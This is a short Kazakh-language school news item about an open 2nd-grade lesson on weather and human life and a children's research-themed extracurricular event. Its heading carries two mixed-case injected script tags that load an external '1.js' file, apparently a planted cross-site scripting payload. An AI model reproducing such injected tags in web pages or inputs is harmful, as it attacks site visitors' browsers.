Сыныптан тыс іс-шаралар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
12.04.2021
Ғ.Әбдірахманов атындағы жалпы орта білім беретін мектебінде 08.04.21ж. күні 2 «А» сыныбында дүниетану пәнінен Макишева Куралай Дабыловна «Адам өміріне ауа райының әсері» тақырыбында ашық сабақ берді. Мақсаты: ауа райының адам өмірі мен шаруашылық іс-әрекетіне оң және кері әсерін талдап бекітті. Сабақта бірнеше әдіс-тәсілдер қолданды. Оқушылар қызуғушылықпен тапсырмаларды орындады.
2 «Ә» сынып жетекшісі - Рахимова Адина Бирликовна «Мен зерттеушімін!» тақырыбында сыныптан тыс іс-шара өткізді. Мақсаты: Тәжірибелер жасау арқылы өз ойларын дәлелдеп, мысалдар келтіріп сипаттап айтты. «Бояулар әлемі», «Кем, артық, тең», «Сабын көпіршіктері» зерттеу жұмыстарын орындап, тест арқылы бекітті. Оқушылар қызығушылық танытып, көтеріңкі көңіл күймен шықты.